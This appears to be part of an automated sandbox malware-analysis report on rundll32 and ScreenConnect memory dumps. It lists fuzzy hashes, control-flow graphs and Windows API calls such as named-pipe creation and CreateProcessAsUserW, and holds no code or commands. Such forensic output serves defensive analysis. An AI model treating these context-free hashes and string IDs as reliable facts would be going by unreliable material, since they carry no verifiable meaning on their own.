                                                                                    • Instruction ID: 9155dcad944a7200932d1a28a12a920d90c2c0bf3ee94de6fcc0aaf81cdaf65f
                                                                                    • Opcode Fuzzy Hash: b04b5fc9d48cefc6a44494b74b644f835d251d61f5268b42e6dbc8162368036f
                                                                                    • Instruction Fuzzy Hash: 1EF0A731300210578325AA6EEC90ADBBBEADFC86643008539F64ACB700EF75EC054BE1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cf09953f83974b0786b3a9deb6d91d2dc8d7b2d4315df13e0731b642886c03bc
                                                                                    • Instruction ID: 9947d3b1a357ad4b00af69b95f7e3898410128c430ecd5948f1652aa3c174750
                                                                                    • Opcode Fuzzy Hash: cf09953f83974b0786b3a9deb6d91d2dc8d7b2d4315df13e0731b642886c03bc
                                                                                    • Instruction Fuzzy Hash: 6DF02B327092401FD3095A29E8507C6BF66DBD6234F2540BEE649C7356DD79CC07CB51
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: de7edd467accb576a07e5543a9cc26ae1a3fc431e2494aaeb889d940086bf93a
                                                                                    • Instruction ID: aba1f475c8d9ccabfed041491681f8a404f7f147832b4893d5ddc83f8987bd2a
                                                                                    • Opcode Fuzzy Hash: de7edd467accb576a07e5543a9cc26ae1a3fc431e2494aaeb889d940086bf93a
                                                                                    • Instruction Fuzzy Hash: E4E0D870901208AFCF04DFA8D9826CD7BF5DB456187004694D80ADB202EE34BE0B6791
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4211182b86c061d62de7c24d38b9ada469fc47e804c6f04e7d67c01da5a690d5
                                                                                    • Instruction ID: 5a86ae0bb05acfd5fcc220bc33922b293e501c2cbdcd45791dae8ea88cf90dc8
                                                                                    • Opcode Fuzzy Hash: 4211182b86c061d62de7c24d38b9ada469fc47e804c6f04e7d67c01da5a690d5
                                                                                    • Instruction Fuzzy Hash: 45E086327142045BD318A92AE850A97F79EDBC9625B50447DE50CC7359DE72DC428690
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4d24c673bb6a36138619c10653af3b867f7c5169b6b7bd7cbcefb49a582ff0dc
                                                                                    • Instruction ID: 867e376256fd67cdf5a82ad9e5b213886255ae0758d65ee085fd2c06d3f0cdd7
                                                                                    • Opcode Fuzzy Hash: 4d24c673bb6a36138619c10653af3b867f7c5169b6b7bd7cbcefb49a582ff0dc
                                                                                    • Instruction Fuzzy Hash: 2DD05E6BE1522457CB051A6020893EB6758CB95064F01ADE3EF998BA06A8289C4303D5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f7d34478ab3c66dd472333d4dfae46d2ee86fc67a53f23f1df45417b5901e15c
                                                                                    • Instruction ID: 43697dddb290641117dcaa8f7fc1f11b1475e741f1fa063c545ae3f16f654406
                                                                                    • Opcode Fuzzy Hash: f7d34478ab3c66dd472333d4dfae46d2ee86fc67a53f23f1df45417b5901e15c
                                                                                    • Instruction Fuzzy Hash: F4D05B323592941FC30AA764F4565E67FB59F4A16130841ABE9858F666CD611C92C3C1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2f4dde271f8554f3a70f83a9806b61e98b70569e4d8902810ce8228328ee63f8
                                                                                    • Instruction ID: 7c717bc91faa182835616246793bacbd00a49d20becf96c3db54de86ceac7caa
                                                                                    • Opcode Fuzzy Hash: 2f4dde271f8554f3a70f83a9806b61e98b70569e4d8902810ce8228328ee63f8
                                                                                    • Instruction Fuzzy Hash: 52E0DFB1D061489FCB00DFA0E90219C7FB0DB45204B0045EAE909DB202EA354F218782
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 763b7871b2d21ffeccfe47ebafcf1ed9e2e27d94a195d6a1fe80b13322a633ac
                                                                                    • Instruction ID: 94d1ba93575bf3f22a7b33eb03cf5a7b69839e609df20841e503bd349c936714
                                                                                    • Opcode Fuzzy Hash: 763b7871b2d21ffeccfe47ebafcf1ed9e2e27d94a195d6a1fe80b13322a633ac
                                                                                    • Instruction Fuzzy Hash: 0ED0A7363201186B56086619D8A9AEA7BA9EB893A13505423FA8187A10DE717C4083D6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9acd6f974f3cc0b76dadeae1a9c8a1c028f84554a08cf3296fa282df0d2c5833
                                                                                    • Instruction ID: 81c54eb85915cf8a9690ac9be5dc8cac4e00acec217762816269c76c1b705f4d
                                                                                    • Opcode Fuzzy Hash: 9acd6f974f3cc0b76dadeae1a9c8a1c028f84554a08cf3296fa282df0d2c5833
                                                                                    • Instruction Fuzzy Hash: 61D01270A01108EB8B44DFA9D90155D77B6DB48214B1046A8D409D7210EE316E049B91
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a6e43c06f7b581db907982a71fdcaf451ac3a06f9cab0c3d8fb3a9eb75cd6835
                                                                                    • Instruction ID: 1c36169d6eda11a3ad36a41897b245a8efb4b5c548a566beb4473d4f887e52c2
                                                                                    • Opcode Fuzzy Hash: a6e43c06f7b581db907982a71fdcaf451ac3a06f9cab0c3d8fb3a9eb75cd6835
                                                                                    • Instruction Fuzzy Hash: 25D05B7090110DEFCB00DFB5DA0255DBBF5DF44204B5085D9E509D7301EA316F009B91
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000003.1691683619.00000000043B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_3_43b0000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: fbe3c64f3f2837da272a0f0335765c4240c0f9db67f675509b888f7ffccb741d
                                                                                    • Instruction ID: 34c3ac12fe72e661fec4aed3292b3c065d1605d3467ae8a77563397912cf223d
                                                                                    • Opcode Fuzzy Hash: fbe3c64f3f2837da272a0f0335765c4240c0f9db67f675509b888f7ffccb741d
                                                                                    • Instruction Fuzzy Hash: 9BD080F77147415FE306090C04511DD77B0FFB3309385D592C5C04C803A1251053C521

                                                                                    Execution Graph

                                                                                    Execution Coverage:11.4%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:2.4%
                                                                                    Total number of Nodes:210
                                                                                    Total number of Limit Nodes:17
                                                                                    [execution_graph: node and edge listing spilled from the rendered graph image (210 nodes, 17 limit nodes); API call nodes visible in the graph: WaitNamedPipeW, RtlGetVersion, CreateNamedPipeW, RegDisablePredefinedCache, CreateFileA, ConnectNamedPipe, CreateProcessAsUserW]

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 0 17b4c63-17b4c6e 1 17b4c71-17b4cb3 0->1 2 17b4c70 0->2 7 17b4d02-17b4d08 1->7 8 17b4cb5-17b4cc4 call 17b4848 1->8 2->1 11 17b4d09-17b4dd8 RtlGetVersion 8->11 12 17b4cc6-17b4ccb 8->12 17 17b4dda-17b4de0 11->17 18 17b4de1-17b4e24 11->18 24 17b4cce call 17b52f8 12->24 25 17b4cce call 17b52e8 12->25 13 17b4cd4 13->7 17->18 22 17b4e2b-17b4e32 18->22 23 17b4e26 18->23 23->22 24->13 25->13
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3519752168.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_17b0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: `Qtq$`Qtq$s4h$s4h
                                                                                    • API String ID: 0-2594444996
                                                                                    • Opcode ID: d075dc8dc9694770e44c0b7ff371f7f2a002c05d2a07690725b648c19671f70b
                                                                                    • Instruction ID: 7d950c73d74edb4ab92447fd377f73ed1054dc161adfdb68c38dcd540072ad1d
                                                                                    • Opcode Fuzzy Hash: d075dc8dc9694770e44c0b7ff371f7f2a002c05d2a07690725b648c19671f70b
                                                                                    • Instruction Fuzzy Hash: F841CD70A043689FDF619F68C8587ADFBB5FB44310F0080E9D60AA7291DB744988CF92

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 331 5cb17b8-5cb17fa 332 5cb17fc-5cb17ff 331->332 333 5cb1802-5cb1867 CreateNamedPipeW 331->333 332->333 335 5cb1869-5cb186f 333->335 336 5cb1870-5cb1891 333->336 335->336
                                                                                    APIs
                                                                                    • CreateNamedPipeW.KERNEL32(00000000,?,?,?,?,?,00000001,00000004), ref: 05CB1854
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3549234909.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_5cb0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateNamedPipe
                                                                                    • String ID: 4Ltq$s4h
                                                                                    • API String ID: 2489174969-3527615514
                                                                                    • Opcode ID: 68ea63e3695c967a8c61535875a368492baf38356fe1e315c85aed436c5def8f
                                                                                    • Instruction ID: 59c2171b376e90d8fa796b53bffdbe8a088d15ee14a58878211a843639d73f03
                                                                                    • Opcode Fuzzy Hash: 68ea63e3695c967a8c61535875a368492baf38356fe1e315c85aed436c5def8f
                                                                                    • Instruction Fuzzy Hash: 4C3103B5800248DFDB10CF9AD484A8EBFF5FF48314F19C469E919AB221C376A955CF51

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 481 5cb01f0-5cb0241 482 5cb024c-5cb0250 481->482 483 5cb0243-5cb0249 481->483 484 5cb0258-5cb026d 482->484 485 5cb0252-5cb0255 482->485 483->482 486 5cb027b-5cb02d2 CreateProcessAsUserW 484->486 487 5cb026f-5cb0278 484->487 485->484 488 5cb02db-5cb0303 486->488 489 5cb02d4-5cb02da 486->489 487->486 489->488
                                                                                    APIs
                                                                                    • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 05CB02BF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3549234909.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_5cb0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateProcessUser
                                                                                    • String ID: s4h
                                                                                    • API String ID: 2217836671-3799315901
                                                                                    • Opcode ID: adf994065d6cf926e171970e4101b83cdb7429dc321b9f2eae7622fc134b23ca
                                                                                    • Instruction ID: f09c4c774facea4843dc15b1bc1e63afe79e1df94af535954b702b5519327171
                                                                                    • Opcode Fuzzy Hash: adf994065d6cf926e171970e4101b83cdb7429dc321b9f2eae7622fc134b23ca
                                                                                    • Instruction Fuzzy Hash: 554155B6900249DFDF10CFA9C884ADEBBF1FF48320F14852AE918A7250D375AA55CF90

                                                                                    Control-flow Graph (nodes: basic-block address ranges with called APIs; edges: from->to)
                                                                                    control_flow_graph 26 60603c5-60603cd 27 60603cf-606042c 26->27 28 606039c-60603b1 26->28 30 6060480-6060503 CreateFileA 27->30 31 606042e-6060453 27->31 51 60603b3 call 60603c5 28->51 52 60603b3 call 60603d0 28->52 39 6060505-606050b 30->39 40 606050c-606054a 30->40 31->30 35 6060455-6060457 31->35 34 60603b8-60603ba 36 606047a-606047d 35->36 37 6060459-6060463 35->37 36->30 41 6060467-6060476 37->41 42 6060465 37->42 39->40 47 606054c-6060550 40->47 48 606055a 40->48 41->41 43 6060478 41->43 42->41 43->36 47->48 49 6060552 47->49 50 606055b 48->50 49->48 50->50 51->34 52->34
                                                                                    APIs
                                                                                    • CreateFileA.KERNEL32(?,?,?,?,?,00000001,00000004), ref: 060604ED
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3549629430.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_6060000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID: 4Ltq$s4h$s4h
                                                                                    • API String ID: 823142352-968180164
                                                                                    • Opcode ID: 54cade52c9e69bb797a1c953f3392bf3a304b082a7c14596bea68883ca3070e0
                                                                                    • Instruction ID: d1b26861e03cf56279b31d8b72ab25486983ea406e246078bb519b0ef1d4e6f7
                                                                                    • Opcode Fuzzy Hash: 54cade52c9e69bb797a1c953f3392bf3a304b082a7c14596bea68883ca3070e0
                                                                                    • Instruction Fuzzy Hash: 4B5168B1D40248DFDB60CFA9C945B9EBFF1FF48304F248529E849AB291D7B59844CB91

                                                                                    Control-flow Graph (nodes: basic-block address ranges with called APIs; edges: from->to)
                                                                                    control_flow_graph 53 60603d0-606042c 54 6060480-6060503 CreateFileA 53->54 55 606042e-6060453 53->55 62 6060505-606050b 54->62 63 606050c-606054a 54->63 55->54 58 6060455-6060457 55->58 59 606047a-606047d 58->59 60 6060459-6060463 58->60 59->54 64 6060467-6060476 60->64 65 6060465 60->65 62->63 70 606054c-6060550 63->70 71 606055a 63->71 64->64 66 6060478 64->66 65->64 66->59 70->71 72 6060552 70->72 73 606055b 71->73 72->71 73->73
                                                                                    APIs
                                                                                    • CreateFileA.KERNEL32(?,?,?,?,?,00000001,00000004), ref: 060604ED
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3549629430.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_6060000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID: 4Ltq$s4h$s4h
                                                                                    • API String ID: 823142352-968180164
                                                                                    • Opcode ID: e3bb086199b33f31a185afdbe5cb73cc655799d793a01236535b795baf0cea12
                                                                                    • Instruction ID: c8099523f56b4e39e50c424e4fc39a2516da63b027da807e2c28b3cec42e15b6
                                                                                    • Opcode Fuzzy Hash: e3bb086199b33f31a185afdbe5cb73cc655799d793a01236535b795baf0cea12
                                                                                    • Instruction Fuzzy Hash: E34144B1D402499FDB50CFAAC984B9EBFF2FB48304F248129E809AB251D7B59844CF91

                                                                                    Control-flow Graph (nodes: basic-block address ranges with called APIs; edges: from->to)
                                                                                    control_flow_graph 74 46131e0-461322d 78 46132a0-46132d5 74->78 79 461322f-4613296 call 4613549 74->79 86 46132d7-46132ed 78->86 87 4613318-461347e 78->87 101 461329e 79->101 92 46132f6-4613316 86->92 93 46132ef 86->93 126 4613487-4613545 87->126 92->87 93->92 101->78
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 4'tq$4'tq$4'tq$4'tq$4'tq
                                                                                    • API String ID: 0-254247153
                                                                                    • Opcode ID: efed9abeafafb66ff2d02e6f7c0e8fca6c6a9c6003b3dc13b9e1b6ed73ac419d
                                                                                    • Instruction ID: 63a0c229351128ce9eca4d8f90fbc15518079f7346f6f9d453064232ac63aae8
                                                                                    • Opcode Fuzzy Hash: efed9abeafafb66ff2d02e6f7c0e8fca6c6a9c6003b3dc13b9e1b6ed73ac419d
                                                                                    • Instruction Fuzzy Hash: FFA1B4706017069FD706EF79D45468EBBF2FF99304B008A5CD04AAF395EF70A9498B91

                                                                                    Control-flow Graph (nodes: basic-block address ranges with called APIs; edges: from->to)
                                                                                    control_flow_graph 142 4613230-46132d5 call 4613549 155 46132d7-46132ed 142->155 156 4613318-461347e 142->156 159 46132f6-4613316 155->159 160 46132ef 155->160 190 4613487-4613545 156->190 159->156 160->159
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 4'tq$4'tq$4'tq$4'tq$4'tq
                                                                                    • API String ID: 0-254247153
                                                                                    • Opcode ID: 84b4eb2feeb68e2f8165c70803a5587058cfe18c328d4a2e7c223e1296bd6877
                                                                                    • Instruction ID: daa9643e0b40af4d238088818dd9d72bf06ee22bc55f44874e7b2305a36d1e33
                                                                                    • Opcode Fuzzy Hash: 84b4eb2feeb68e2f8165c70803a5587058cfe18c328d4a2e7c223e1296bd6877
                                                                                    • Instruction Fuzzy Hash: 978162706007069FD756EF79D45469EBBE2FF88304B008A2CD40AAF794EF70B9488B91

                                                                                    Control-flow Graph (nodes: basic-block address ranges with called APIs; edges: from->to)
                                                                                    control_flow_graph 298 6062b40-6062bcb 304 6062bdc-6062bf4 298->304 305 6062bcd-6062bda 298->305 306 6062cb6-6062cbe 304->306 305->304 309 6062bf9-6062c28 RegDisablePredefinedCache 305->309 312 6062cbf 306->312 310 6062c31-6062c4c call 6062608 309->310 311 6062c2a-6062c30 309->311 316 6062c51-6062c6d 310->316 311->310 312->312 319 6062c6f 316->319 320 6062c78-6062cb4 316->320 319->320 320->306
                                                                                    APIs
                                                                                    • RegDisablePredefinedCache.ADVAPI32 ref: 06062C11
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3549629430.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_6060000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CacheDisablePredefined
                                                                                    • String ID: `Qtq$s4h
                                                                                    • API String ID: 1885667121-3363078372
                                                                                    • Opcode ID: d71c5800651c3d8408583f9012dc2ef10ddf2462d28607d18f8275b4afcfa878
                                                                                    • Instruction ID: 1f6852edc569d15afebe02c240b7e8ca2fac8f9b2a94f2318f64f42ae9f5ae9b
                                                                                    • Opcode Fuzzy Hash: d71c5800651c3d8408583f9012dc2ef10ddf2462d28607d18f8275b4afcfa878
                                                                                    • Instruction Fuzzy Hash: D4316570D002489FDB54DFAAD944B9EBFF5EF88310F148829E806AB390DB74A945CF90

                                                                                    Control-flow Graph (nodes: basic-block address ranges with called APIs; edges: from->to)
                                                                                    control_flow_graph 322 5cb17b1-5cb17fa 324 5cb17fc-5cb17ff 322->324 325 5cb1802-5cb1867 CreateNamedPipeW 322->325 324->325 327 5cb1869-5cb186f 325->327 328 5cb1870-5cb1891 325->328 327->328
                                                                                    APIs
                                                                                    • CreateNamedPipeW.KERNEL32(00000000,?,?,?,?,?,00000001,00000004), ref: 05CB1854
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3549234909.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_5cb0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateNamedPipe
                                                                                    • String ID: 4Ltq$s4h
                                                                                    • API String ID: 2489174969-3527615514
                                                                                    • Opcode ID: 078f06f94efd71e288ba9191c688c81a7e9596fd67894279cc4cf66a6d40ab5b
                                                                                    • Instruction ID: db5d922d144b54374a5aebfaf31a542e2226402459d713a3ae8d3e7ef8d1b6cd
                                                                                    • Opcode Fuzzy Hash: 078f06f94efd71e288ba9191c688c81a7e9596fd67894279cc4cf66a6d40ab5b
                                                                                    • Instruction Fuzzy Hash: D13124B5800248DFCB10CF9AD484ACEBFF5FF48314F188459E919AB221C376A955CF51

                                                                                    Control-flow Graph (nodes: basic-block address ranges with called APIs; edges: from->to)
                                                                                    control_flow_graph 469 5cb01e8-5cb0241 471 5cb024c-5cb0250 469->471 472 5cb0243-5cb0249 469->472 473 5cb0258-5cb026d 471->473 474 5cb0252-5cb0255 471->474 472->471 475 5cb027b-5cb02d2 CreateProcessAsUserW 473->475 476 5cb026f-5cb0278 473->476 474->473 477 5cb02db-5cb0303 475->477 478 5cb02d4-5cb02da 475->478 476->475 478->477
                                                                                    APIs
                                                                                    • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 05CB02BF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3549234909.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_5cb0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateProcessUser
                                                                                    • String ID: s4h
                                                                                    • API String ID: 2217836671-3799315901
                                                                                    • Opcode ID: c912280be1f33b43b8eb14f8d3a2ed992e9bc89b410942de10a4aa7afc65db81
                                                                                    • Instruction ID: 494899873ac4f84f9992e04488b271a62eebf20cd726dde9dba8dd95f20475b9
                                                                                    • Opcode Fuzzy Hash: c912280be1f33b43b8eb14f8d3a2ed992e9bc89b410942de10a4aa7afc65db81
                                                                                    • Instruction Fuzzy Hash: 84417776900209DFDF10CFA9C884ADEBBF1FF48310F04892AE918A7210D774AA55CF90

                                                                                    Control-flow Graph (nodes: basic-block address ranges with called APIs; edges: from->to)
                                                                                    control_flow_graph 492 5cb1e44-5cb1e4c 493 5cb1e68-5cb1ede ConnectNamedPipe 492->493 494 5cb1e4e-5cb1e61 492->494 496 5cb1ee0-5cb1ee6 493->496 497 5cb1ee7-5cb1f29 493->497 494->493 496->497 501 5cb1f2b 497->501 502 5cb1f33 497->502 501->502 503 5cb1f34 502->503 503->503
                                                                                    APIs
                                                                                    • ConnectNamedPipe.KERNEL32(00000000), ref: 05CB1EC8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3549234909.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_5cb0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: ConnectNamedPipe
                                                                                    • String ID: s4h
                                                                                    • API String ID: 2191148154-3799315901
                                                                                    • Opcode ID: f6a427926dca63577882048bdea43d3e61a78f70af5b72aad8f1fd896639c7fc
                                                                                    • Instruction ID: a655ac1196097ed5b5509e892d118e958961a878c4528afe320f77f376ec6c1a
                                                                                    • Opcode Fuzzy Hash: f6a427926dca63577882048bdea43d3e61a78f70af5b72aad8f1fd896639c7fc
                                                                                    • Instruction Fuzzy Hash: 022143B4D00258DFDB24CFA9D594BDEBBF4AF08310F14846AE809AB350CBB59901CFA0

                                                                                    Control-flow Graph (nodes: basic-block address ranges with called APIs; edges: from->to)
                                                                                    control_flow_graph 504 5cb1e50-5cb1ede ConnectNamedPipe 507 5cb1ee0-5cb1ee6 504->507 508 5cb1ee7-5cb1f29 504->508 507->508 512 5cb1f2b 508->512 513 5cb1f33 508->513 512->513 514 5cb1f34 513->514 514->514
                                                                                    APIs
                                                                                    • ConnectNamedPipe.KERNEL32(00000000), ref: 05CB1EC8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3549234909.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_5cb0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: ConnectNamedPipe
                                                                                    • String ID: s4h
                                                                                    • API String ID: 2191148154-3799315901
                                                                                    • Opcode ID: e07ed48583a7e0e1b9632431d8ec19b9fcd7be65480ef1cbc4400cb08d857389
                                                                                    • Instruction ID: 6d1bca2e89a4b1dd73a97764d1348ab6e54e9c759033273806479bfc1cb30b14
                                                                                    • Opcode Fuzzy Hash: e07ed48583a7e0e1b9632431d8ec19b9fcd7be65480ef1cbc4400cb08d857389
                                                                                    • Instruction Fuzzy Hash: 192133B0D00258DFDB24CFAAD494BDEBBF4AF48310F148469E809AB350CBB59901CFA0

                                                                                    Control-flow Graph (nodes: basic-block address ranges with called APIs; edges: from->to)
                                                                                    control_flow_graph 515 5cb5b80-5cb5bc8 517 5cb5bca-5cb5bcd 515->517 518 5cb5bd0-5cb5c02 WaitNamedPipeW 515->518 517->518 519 5cb5c0b-5cb5c33 518->519 520 5cb5c04-5cb5c0a 518->520 520->519
                                                                                    APIs
                                                                                    • WaitNamedPipeW.KERNEL32(00000000), ref: 05CB5BEF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3549234909.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_5cb0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: NamedPipeWait
                                                                                    • String ID: s4h
                                                                                    • API String ID: 3146367894-3799315901
                                                                                    • Opcode ID: 3c111d54eb50552297057918627fe2d09649999f804df59d3d284b707a05ed3c
                                                                                    • Instruction ID: 91de2895f86d7a47066b0d9d03e9d98d5ef61ffc2f6fcff2a7e13a05d9b3b113
                                                                                    • Opcode Fuzzy Hash: 3c111d54eb50552297057918627fe2d09649999f804df59d3d284b707a05ed3c
                                                                                    • Instruction Fuzzy Hash: C52127B6C002498FDB10CF9AD445AEEBBF4FB48324F14842ED859A7240D7B9A545CFA1
                                                                                    APIs
                                                                                    • WaitNamedPipeW.KERNEL32(00000000), ref: 05CB5BEF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3549234909.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_5cb0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: NamedPipeWait
                                                                                    • String ID: s4h
                                                                                    • API String ID: 3146367894-3799315901
